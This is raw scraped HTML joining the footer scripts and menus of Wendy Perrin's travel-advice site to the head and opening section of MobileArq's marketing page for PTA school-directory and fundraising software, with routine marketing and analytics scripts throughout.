id="footer-copyright"> <span>Copyright Wendy Perrin 2019. All Rights Reserved.</span> </div><!-- #footer-copyright --> </div><!-- #footer-content --> </div><!-- #footer-wrap --> </div><!-- #site-wrap --> <!-- This site is converting visitors into subscribers and customers with OptinMonster - http://optinmonster.com --><div id="om-hmjlffbstr58igsc-holder"></div><script>var hmjlffbstr58igsc,hmjlffbstr58igsc_poll=function(){var r=0;return function(n,l){clearInterval(r),r=setInterval(n,l)}}();!function(e,t,n){if(e.getElementById(n)){hmjlffbstr58igsc_poll(function(){if(window['om_loaded']){if(!hmjlffbstr58igsc){hmjlffbstr58igsc=new OptinMonsterApp();return hmjlffbstr58igsc.init({u:"19866.354741",staging:0,dev:0,beta:0});}}},25);return;}var d=false,o=e.createElement(t);o.id=n,o.src="//a.optnmnstr.com/app/js/api.min.js",o.onload=o.onreadystatechange=function(){if(!d){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){try{d=om_loaded=true;hmjlffbstr58igsc=new OptinMonsterApp();hmjlffbstr58igsc.init({u:"19866.354741",staging:0,dev:0,beta:0});o.onload=o.onreadystatechange=null;}catch(t){}}}};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(o)}(document,"script","omapi-script");</script><!-- / OptinMonster --><!-- This site is converting visitors into subscribers and customers with OptinMonster - http://optinmonster.com --><div id="om-gtidnicw0bs9kq4p-holder"></div><script>var gtidnicw0bs9kq4p,gtidnicw0bs9kq4p_poll=function(){var r=0;return function(n,l){clearInterval(r),r=setInterval(n,l)}}();!function(e,t,n){if(e.getElementById(n)){gtidnicw0bs9kq4p_poll(function(){if(window['om_loaded']){if(!gtidnicw0bs9kq4p){gtidnicw0bs9kq4p=new OptinMonsterApp();return gtidnicw0bs9kq4p.init({u:"19866.357656",staging:0,dev:0,beta:0});}}},25);return;}var d=false,o=e.createElement(t);o.id=n,o.src="//a.optnmnstr.com/app/js/api.min.js",o.onload=o.onreadystatechange=function(){if(!d){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){try{d=om_loaded=true;gtidnicw0bs9kq4p=new OptinMonsterApp();gtidnicw0bs9kq4p.init({u:"19866.357656",staging:0,dev:0,beta:0});o.onload=o.onreadystatechange=null;}catch(t){}}}};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(o)}(document,"script","omapi-script");</script><!-- / OptinMonster --> <script type="text/javascript">var hmjlffbstr58igsc_shortcode = true;var gtidnicw0bs9kq4p_shortcode = true;</script> <!-- <link rel='stylesheet' id='gforms_reset_css-css' href='https://www.wendyperrin.com/wp-content/plugins/gravityforms/css/formreset.min.css?ver=2.4.6' type='text/css' media='all' /> --> <!-- <link rel='stylesheet' id='gforms_formsmain_css-css' href='https://www.wendyperrin.com/wp-content/plugins/gravityforms/css/formsmain.min.css?ver=2.4.6' type='text/css' media='all' /> --> <!-- <link rel='stylesheet' id='gforms_ready_class_css-css' href='https://www.wendyperrin.com/wp-content/plugins/gravityforms/css/readyclass.min.css?ver=2.4.6' type='text/css' media='all' /> --> <!-- <link rel='stylesheet' id='gforms_browsers_css-css' href='https://www.wendyperrin.com/wp-content/plugins/gravityforms/css/browsers.min.css?ver=2.4.6' type='text/css' media='all' /> --> <link rel="stylesheet" type="text/css" href="//www.wendyperrin.com/wp-content/cache/wpfc-minified/f53ykaho/9tqn9.css" media="all"/> <script type='text/javascript'> /* <![CDATA[ */ var ajax_object = {"ajax_url":"https:\/\/www.wendyperrin.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/gf-presubmission/gfpre-script.js?ver=2.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var qpprFrontData = {"linkData":[],"siteURL":"https:\/\/www.wendyperrin.com","siteURLq":"https:\/\/www.wendyperrin.com"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.1.8'></script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-includes/js/comment-reply.min.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/themes/twentytwelve/js/navigation.js?ver=20140711'></script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-includes/js/wp-embed.min.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.4.6'></script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.4.6'></script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/gravity-forms-duplicate-prevention/gravityforms-duplicateprevention.js?ver=0.1.5'></script> <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/sliderpro/public/assets/js/jquery.sliderPro.min.js?ver=4.5.0'></script> <div id="sdrn_bar" class="sdrn_bar" data-from_width="768"> <div class="sdrn_ic"> <span class="sdrn_ic_1"></span> <span class="sdrn_ic_2"></span> <span class="sdrn_ic_3"></span> </div> <!--<span class="sdrn_icon sdrn_icon_menu" data-icon="m"></span>--> <span class="menu_title"> <img class="bar_logo" src="https://www.wendyperrin.com/dev/wp-content/uploads/2014/09/wp-logo-white-mobile.png"/> </span> </div> <div id="sdrn_menu" class="sdrn_levels top " data-custom_icon="" data-custom_icon_open="" data-zooming="no" data-swipe_actions="yes" > <ul id="sdrn_menu_ul"> <li id="menu-item-3602" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-5 current_page_item menu-item-3602"><a href="https://www.wendyperrin.com/">Home</a></li> <li id="menu-item-3603" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3603"><a href="https://www.wendyperrin.com/about/">About</a></li> <li id="menu-item-3604" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3604"><a href="https://www.wendyperrin.com/ask-wendy-question/">Ask Wendy</a></li> <li id="menu-item-3607" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3607"><a href="https://www.wendyperrin.com/travel-tips/">Travel Tips</a> <ul class="sub-menu"> <li id="menu-item-3611" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3611"><a href="https://www.wendyperrin.com/travel-tips/family-travel/">Family Travel</a></li> <li id="menu-item-30079" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-30079"><a href="https://www.wendyperrin.com/category/travel-tips/avoid-crowds/">Avoiding Crowds</a></li> <li id="menu-item-3608" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3608"><a href="https://www.wendyperrin.com/travel-tips/airline-travel/">Airline Travel</a></li> <li id="menu-item-24433" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-24433"><a href="https://www.wendyperrin.com/ideal-best-island-for-each-month-year/">Islands</a></li> <li id="menu-item-3610" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3610"><a href="https://www.wendyperrin.com/travel-tips/cruises/">Cruises</a></li> <li id="menu-item-22737" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22737"><a href="https://www.wendyperrin.com/category/plan_a_trip/holiday-travel/">Holidays &#038; School Breaks</a></li> </ul> </li> <li id="menu-item-4683" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4683"><a href="https://www.wendyperrin.com/wow-list/">The WOW List</a> <ul class="sub-menu"> <li id="menu-item-17361" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17361"><a href="https://www.wendyperrin.com/wow-list">Tested Experts</a></li> <li id="menu-item-17362" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17362"><a href="https://www.wendyperrin.com/secret-to-extraordinary-travel">Reviews by Travelers</a></li> <li id="menu-item-26066" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-26066"><a href="https://www.wendyperrin.com/category/travel-tips/wow-moments/">WOW Moments</a></li> </ul> </li> <li id="menu-item-17363" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-17363"><a href="https://www.wendyperrin.com/plan-trip-faq">Start A Trip</a> <ul class="sub-menu"> <li id="menu-item-17364" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17364"><a href="https://www.wendyperrin.com/plan-trip-faq">Read This First: FAQs</a></li> <li id="menu-item-17365" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17365"><a href="https://www.wendyperrin.com/category/plan_a_trip/where-to-go-when/">Where to Go When</a></li> <li id="menu-item-17366" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17366"><a href="https://www.wendyperrin.com/category/plan_a_trip/best-times-to-book-trips/">What to Book When</a></li> <li id="menu-item-17367" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17367"><a href="https://www.wendyperrin.com/the-benefits-of-booking-a-trip-early">Why to Book Early</a></li> <li id="menu-item-17368" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17368"><a href="https://www.wendyperrin.com/wendy-amp-your-trip">WOW Moments FAQ</a></li> </ul> </li> <li id="menu-item-27436" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27436"><a href="https://www.wendyperrin.com/secret-to-extraordinary-travel/">Reviews</a></li> <li id="menu-item-3605" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3605"><a href="https://www.wendyperrin.com/contact/">Contact</a></li> </ul> </div> <script type="text/javascript">var omapi_localized = { ajax: 'https://www.wendyperrin.com/wp-admin/admin-ajax.php?optin-monster-ajax-route=1', nonce: 'f812004a8b', slugs: {"hmjlffbstr58igsc":{"slug":"hmjlffbstr58igsc","mailpoet":false},"gtidnicw0bs9kq4p":{"slug":"gtidnicw0bs9kq4p","mailpoet":false}} };</script> <!-- SMOOTH SCROLL TO --> <script> $(function() { $('a[href*=#]:not([href=#])').click(function() { if (location.pathname.replace(/^\//,'') == this.pathname.replace(/^\//,'') && location.hostname == this.hostname) { var target = $(this.hash); target = target.length ? target : $('[name=' + this.hash.slice(1) +']'); if (target.length) { $('html,body').animate({ scrollTop: target.offset().top-60 }, 1000); return false; } } }); }); </script> <!-- RESPONSIVE EQUAL HEIGHT DIVS --> <script> equalheight = function(container){ var currentTallest = 0, currentRowStart = 0, rowDivs = new Array(), $el, topPosition = 0; $(container).each(function() { $el = $(this); $($el).height('auto') topPostion = $el.position().top; if (currentRowStart != topPostion) { for (currentDiv = 0 ; currentDiv < rowDivs.length ; currentDiv++) { rowDivs[currentDiv].height(currentTallest); } rowDivs.length = 0; // empty the array currentRowStart = topPostion; currentTallest = $el.height(); rowDivs.push($el); } else { rowDivs.push($el); currentTallest = (currentTallest < $el.height()) ? ($el.height()) : (currentTallest); } for (currentDiv = 0 ; currentDiv < rowDivs.length ; currentDiv++) { rowDivs[currentDiv].height(currentTallest); } }); } $(window).load(function() { equalheight('#footer-articles .column-article'); }); $(window).resize(function(){ equalheight('#footer-articles .column-article'); }); </script> <!-- STICKY NAV --> <!-- <script type="text/javascript"> // STICKY NAV var $window = $(window), $stickyEl = $('#navigation-wrap'), elTop = $stickyEl.offset().top; $window.scroll(function() { $stickyEl.toggleClass('sticky', $window.scrollTop() > elTop); }); </script> --> <!-- MAC SAFARI --> <script> (function($){ // console.log(navigator.userAgent); /* Adjustments for Safari on Mac */ if (navigator.userAgent.indexOf('Safari') != -1 && navigator.userAgent.indexOf('Mac') != -1 && navigator.userAgent.indexOf('Chrome') == -1) { // console.log('Safari on Mac detected, applying class...'); $('html').addClass('safari-mac'); // provide a class for the safari-mac specific css to filter with } })(jQuery); </script> <div style='display: none'> </div> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"04c73b6aac","applicationID":"8961593","transactionName":"YlNaZUFVWkBUWxdeDVsZbUNaG11dUV0bGRJdRg==","queueTime":0,"applicationTime":136,"atts":"ThRZEwlPSU4=","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html><!-- WP Fastest Cache file was created in 0.77733206748962 seconds, on 16-05-19 10:39:22 --><!-- via php -->
0
<!DOCTYPE html><html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link type="text/css" media="all" href="https://mobilearq.com/wp-content/cache/autoptimize/css/autoptimize_7ecce174ca22e737f3561e96f4ff3818.css" rel="stylesheet" /><title itemprop="name">Online School Directory and PTA Management Software</title><meta name="description" content="Manage your school directory, memberships and fundraising with online stores in one place" /><meta name="keywords" content="school directory app" /><link rel="shortcut icon" href="https://mobilearq.com/wp-content/uploads/2018/06/fav_icon.jpg" /> <script id="mfn-dnmc-config-js">// window.mfn_ajax = "https://mobilearq.com/wp-admin/admin-ajax.php"; window.mfn_mobile_init = 1240; window.mfn_nicescroll = 40; window.mfn_parallax = "translate3d"; window.mfn_prettyphoto = {style:"pp_default", width:0, height:0}; window.mfn_sliders = {blog:0, clients:0, offer:0, portfolio:0, shop:0, slider:0, testimonials:0}; window.mfn_retina_disable = 0; //</script> <meta name="description" content="An online school directory app and communications+fundraising platform for the PTA. Volunteer management. Membership management/tracking. E-commerce."/><meta name="robots" content="noodp"/><link rel="canonical" href="https://mobilearq.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="PTA Software - PTA Software and PTO Software" /><meta property="og:description" content="An online school directory app and communications+fundraising platform for the PTA. Volunteer management. Membership management/tracking. E-commerce." /><meta property="og:url" content="https://mobilearq.com/" /><meta property="og:site_name" content="PTA Software and PTO Software" /><meta property="og:image" content="http://mobilearq.com/wp-content/uploads/2014/09/home-page-top.jpg" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:description" content="An online school directory app and communications+fundraising platform for the PTA. Volunteer management. Membership management/tracking. E-commerce." /><meta name="twitter:title" content="PTA Software - PTA Software and PTO Software" /><meta name="twitter:site" content="@mobilearq9" /><meta name="twitter:image" content="http://mobilearq.com/wp-content/uploads/2014/09/home-page-top.jpg" /><meta name="twitter:creator" content="@mobilearq9" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","url":"https:\/\/mobilearq.com\/","name":"PTA Software and PTO Software","potentialAction":{"@type":"SearchAction","target":"https:\/\/mobilearq.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","url":"https:\/\/mobilearq.com\/","sameAs":["http:\/\/www.facebook.com\/MobileArq","https:\/\/www.instagram.com\/mobileschooldirectory\/","http:\/\/www.linkedin.com\/in\/nmallavarupu","https:\/\/www.youtube.com\/channel\/UCK_7af53icSgRno2cV7icjQ","https:\/\/twitter.com\/mobilearq9"],"name":"MobileArq","logo":"http:\/\/mobilearq.com\/wp-content\/uploads\/2016\/04\/logo.png"}</script> <link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="PTA Software and PTO Software &raquo; Feed" href="https://mobilearq.com/feed/" /><link rel="alternate" type="application/rss+xml" title="PTA Software and PTO Software &raquo; Comments Feed" href="https://mobilearq.com/comments/feed/" /><link rel="alternate" type="application/rss+xml" title="PTA Software and PTO Software &raquo; PTA Software Comments Feed" href="https://mobilearq.com/pta-software-4-final/feed/" /><link rel='stylesheet' id='Roboto-css' href='https://fonts.googleapis.com/css?family=Roboto%3A300%2C400%2C400italic%2C700%2C700italic&#038;ver=118044f991fc5dc8c6a1fe754057a656' type='text/css' media='all' /> <script type='text/javascript' src='https://mobilearq.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript'>var _EPYT_ = {"ajaxurl":"https:\/\/mobilearq.com\/wp-admin\/admin-ajax.php","security":"80617e4647","gallery_scrolloffset":"20","eppathtoscripts":"https:\/\/mobilearq.com\/wp-content\/plugins\/youtube-embed-plus\/scripts\/","epresponsiveselector":"[\"iframe.__youtube_prefs_widget__\"]","epdovol":"1","version":"11.1","evselector":"iframe.__youtube_prefs__[src], iframe[src*=\"youtube.com\/embed\/\"], iframe[src*=\"youtube-nocookie.com\/embed\/\"]"};</script> <link rel='shortlink' href='https://mobilearq.com/' /><link rel="alternate" type="application/json+oembed" href="https://mobilearq.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmobilearq.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://mobilearq.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmobilearq.com%2F&#038;format=xml" /> <script>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1561149694139507'); fbq('track', 'PageView');</script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1561149694139507&ev=PageView&noscript=1" /></noscript> <script type="text/javascript">(function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//mobilearq.com/?wordfence_logHuman=1&hid=9B473BDE642A26A131E9B0EC4C593CD7');</script> <!--[if lt IE 9]> <script id="mfn-html5" src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://mobilearq.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE 8]><link rel="stylesheet" type="text/css" href="https://mobilearq.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]--><link rel="icon" href="https://mobilearq.com/wp-content/uploads/2016/12/cropped-MobileArq-Icon-N-512X512-32x32.png" sizes="32x32" /><link rel="icon" href="https://mobilearq.com/wp-content/uploads/2016/12/cropped-MobileArq-Icon-N-512X512-192x192.png" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://mobilearq.com/wp-content/uploads/2016/12/cropped-MobileArq-Icon-N-512X512-180x180.png" /><meta name="msapplication-TileImage" content="https://mobilearq.com/wp-content/uploads/2016/12/cropped-MobileArq-Icon-N-512X512-270x270.png" /> <noscript><style type="text/css">.wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><meta property="fb:app_id" content="393373457383153"/><meta property="og:locale" content="en_US"/><meta property="og:site_name" content="PTA Software and PTO Software"/><meta property="og:title" content="PTA Software"/><meta itemprop="name" content="PTA Software"/><meta property="og:url" content="https://mobilearq.com"/><meta name="twitter:url" content="https://mobilearq.com"/><meta property="og:type" content="website"/><meta property="og:description" content="PTA Management software for managing your school directory, fundraising and volunteers all in one place. PTAs are saving hundreds of hours of time and makes money easily with the MobileArq platform. The school directory mobile app is not only a fundraiser for the school but provides parents a life"/><meta itemprop="description" content="PTA Management software for managing your school directory, fundraising and volunteers all in one place. PTAs are saving hundreds of hours of time and makes money easily with the MobileArq platform. The school directory mobile app is not only a fundraiser for the school but provides parents a life"/><meta property="og:image" content="https://mobilearq.com/wp-content/uploads/2014/09/home-phone.jpg"/><meta itemprop="image" content="https://mobilearq.com/wp-content/uploads/2014/09/home-phone.jpg"/><meta name="twitter:card" content="summary_large_image"/></head><body class="home page-template-default page page-id-11269 color-custom style-simple layout-full-width boxed2fw nice-scroll-on mobile-tb-right no-content-padding hide-love header-classic minimalist-header-no sticky-header sticky-tb-color ab-hide subheader-title-left menuo-right footer-copy-center wpb-js-composer js-comp-ver-4.10 vc_responsive"><div id="Sliding-top" class="st-1"><div class="widgets_wrapper"><div class="container"><div class="one-third column"><aside id="text-6" class="widget widget_text"><div class="textwidget"><h5 style="margin-bottom: 5px;"><i class=" icon-mail-line"></i> Our address:</h5><p style="margin-left: 26px;"><strong>MobileArq</strong><br>PO Box 75,<br> Summit, NJ 07902</p><h5 style="margin-bottom: 5px;"><i class=" icon-phone"></i> Have any questions?</h5><p style="margin-left: 26px;"><a href="mailto:[email protected]">[email protected]</a></p><h5 style="margin-bottom: 5px;"><i class=" icon-comment-line"></i> Call us:</h5><p style="margin-left: 26px;"><a href="tel:1-908-273-3458">1-908-273-3458</a></p></div></aside></div><div class="one-third column"><aside id="text-7" class="widget widget_text"><h4>Our company</h4><div class="textwidget"><p>MobileArq specializes in creating simple to use, simple to adopt, and simple to self-service communication solutions for schools, clubs and groups. MobileArq's app provides parents their school at their fingertips. With the all-in-one management platform for directory and fundraising, PTAs and PTOs are saving hundreds of hours and raising tens of thousands in fundraising.</p></div></aside></div><div class="one-third column"><aside id="text-9" class="widget widget_text"><h4>Mission</h4><div class="textwidget"><p>Our mission is to build better connected communities.</p></div></aside></div></div></div><a href="#" class="sliding-top-control"><span><i class="plus icon-down-open-mini"></i><i class="minus icon-up-open-mini"></i></span></a></div><div id="Wrapper"><div id="Header_wrapper" ><header id="Header"><div class="header_placeholder"></div><div id="Top_bar" class="loading"><div class="container"><div class="column one"><div class="top_bar_left clearfix"><div class="logo"> <a id="logo" href="https://mobilearq.com" title="PTA Software and PTO Software"><img class="logo-main scale-with-grid" src="https://mobilearq.com/wp-content/uploads/2018/06/MobileArq-02202018-DP-RN-smaller-white-theme-min.png" alt="MobileArq-02202018-DP-RN smaller white theme-min" /><img class="logo-sticky scale-with-grid" src="https://mobilearq.com/wp-content/uploads/2018/06/MobileArq-02202018-DP-RN-smaller-white-theme-min.png" alt="MobileArq-02202018-DP-RN smaller white theme-min" /><img class="logo-mobile scale-with-grid" src="https://mobilearq.com/wp-content/uploads/2018/06/MobileArq-02202018-DP-RN-smaller-white-theme-min.png" alt="MobileArq-02202018-DP-RN smaller white theme-min" /></a></div><div class="menu_wrapper"><nav id="menu" class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-11294" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-11269 current_page_item menu-item-has-children"><a href="https://mobilearq.com/"><span>Directory+</span></a><ul class="sub-menu"><li id="menu-item-10184" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://mobilearq.com/security/"><span>Security</span></a></li><li id="menu-item-11364" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://mobilearq.com/feedback/"><span>Feedback</span></a></li></ul></li><li id="menu-item-10201" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://mobilearq.com/blog/"><span>Blog</span></a></li><li id="menu-item-11334" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><a href="https://mobilearq.com/our-story/"><span>About</span></a><ul class="sub-menu"><li id="menu-item-10169" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://mobilearq.com/about-mobilearq-2/"><span>Our Team</span></a></li><li id="menu-item-10311" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://mobilearq.com/mobilearq-school-directory-press/"><span>Press</span></a></li></ul></li><li id="menu-item-11328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children"><a href="https://mobilearq.com/contactus/"><span>Contact Us</span></a><ul class="sub-menu"><li id="menu-item-11314" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://mobilearq.com/admin-support/"><span>Admin Support</span></a></li><li id="menu-item-11313" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://mobilearq.com/user-support/"><span>User Support</span></a></li></ul></li></ul></nav><a class="responsive-menu-toggle " href="#"><i class="icon-menu"></i></a></div><div class="secondary_menu_wrapper"></div><div class="banner_wrapper"></div><div class="search_wrapper"><form method="get" id="searchform" action="https://mobilearq.com/"> <i class="icon_search icon-search"></i> <a href="#" class="icon_close"><i class="icon-cancel"></i></a> <input type="text" class="field" name="s" id="s" placeholder="Enter your search" /> <input type="submit" class="submit" value="" style="display:none;" /></form></div></div><div class="top_bar_right"><div class="top_bar_right_wrapper"><a id="search_button" href="#"><i class="icon-search"></i></a></div></div></div></div></div></header></div><div id="Content"><div class="content_wrapper clearfix"><div class="sections_group"><div class="entry-content" itemprop="mainContentOfPage"><div class="section mcb-section " style="padding-top:0px; padding-bottom:0px; background-color:" ><div class="section_wrapper mcb-section-inner"><div class="wrap mcb-wrap one column-margin-0px valign-middle clearfix" style="padding:40px" ><div class="mcb-wrap-inner"><div class="column mcb-column one column_fancy_heading "><div class="fancy_heading fancy_heading_icon"><div class="animate" data-anim-type="fadeIn"><div class="inside"><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:200"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:50px; line-height:50px; font-weight:200; color:#404040;">School Connectivity & Fundraising Made Easy!</div></div></div></div></div><div class="column mcb-column one column_divider "><hr class="hr_narrow " style="margin: 0 auto 20px;"/></div><div class="column mcb-column one-second column_image "><div class="animate" data-anim-type="fadeInLeftLarge"><div class="image_frame image_item no_link scale-with-grid alignright no_border inline-block" ><div class="image_wrapper"><img class="scale-with-grid" src="https://mobilearq.com/wp-content/uploads/2018/05/MA-Landing-Page-iPhone8Silver-2018-smaller-min.png" alt="MA Landing Page-iPhone8Silver-2018 smaller-min" width="275" height="557" /></div></div></div></div><div class="column mcb-column one-second column_column column-margin-"><div class="column_attr align_left animate" data-anim-type="fadeInRightLarge" style=" padding:30px;"><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:45px; line-height:45px; font-weight:300; color:#404040;">Who's It For?</div><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:30px; line-height:30px; font-weight:300; color:#404040;">School Parent Organizations; e.g., PTAs & PTOs</div><hr class="" style="margin: 0 auto 15px;"/><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:45px; line-height:45px; font-weight:300; color:#404040;">What Does It Do?</div><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:30px; line-height:30px; font-weight:300; color:#404040;">District-wide mobile and online directory</div><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:30px; line-height:30px; font-weight:300; color:#404040;">Setup online stores in minutes for school fundraising</div><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:30px; line-height:30px; font-weight:300; color:#404040;">Linked to a custom & mobile website for the PTAs</div><link type="text/css" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300"><div class="google_font" style="font-family:'Roboto',Arial,Tahoma,sans-serif; font-size:30px; line-height:30px; font-weight:300; color:#404040;">All-in-one PTA management solution</div></div></div><div class="column mcb-column one-second column_placeholder"><div class="placeholder">&nbsp;</div></div><div class="column mcb-column one-sixth column_button"><div class="button_align align_center"><a class="button button_large button_js" href="https://mobilearq.com/testimonials/" target="_blank" style=" background-color:#75D175 !important; color:white;" ><span class="button_label"> User Feedback </span></a></div></div><div class="column mcb-column one-sixth column_button"><div class="button_align align_center"><a class="button button_large button_js" href="https://mobilearq.com/show-mobilearq-school-directory-app" target="_blank" style=" background-color:#66cc66 !important; color:white;" ><span class="button_label">Show Me the App</span></a></div></div><div class="column mcb-column one-sixth column_button"><div class="button_align align_center"><a class="button button_large button_js" href="https://my-schedule.timetrade.com/app/td-3486126/workflows/qrbr1/schedule/welcome?wfsid=16a5bde1-baba97f6-16a5be29-baba97f6-00000004-57soqcffpb2n02oajkadalrsu92h4cdl&view=full&fs=1" target="_blank" style=" background-color:#5BB75B !important; color:white;" ><span class="button_label">Schedule a Demo</span></a></div></div></div></div></div></div><div class="section mcb-section full-screen " style="padding-top:300px; padding-bottom:300px; background-color:#838385" data-parallax="3d"><img class="mfn-parallax" src="https://mobilearq.com/wp-content/uploads/2018/12/Childrennwsapp1s1-min.jpg" alt="parallax background"/><div class="section_wrapper mcb-section-inner"><div class="wrap mcb-wrap one valign-middle clearfix" style="padding:50px" ><div class="mcb-wrap-inner"><div class="column mcb-column four-fifth column_placeholder"><div class="placeholder">&nbsp;</div></div><div class="column mcb-column four-fifth column_placeholder"><div class="placeholder">&nbsp;</div></div><div class="column mcb-column four-fifth column_placeholder"><div class="placeholder">&nbsp;</div></div><div class="column mcb-column four-fifth column_fancy_heading 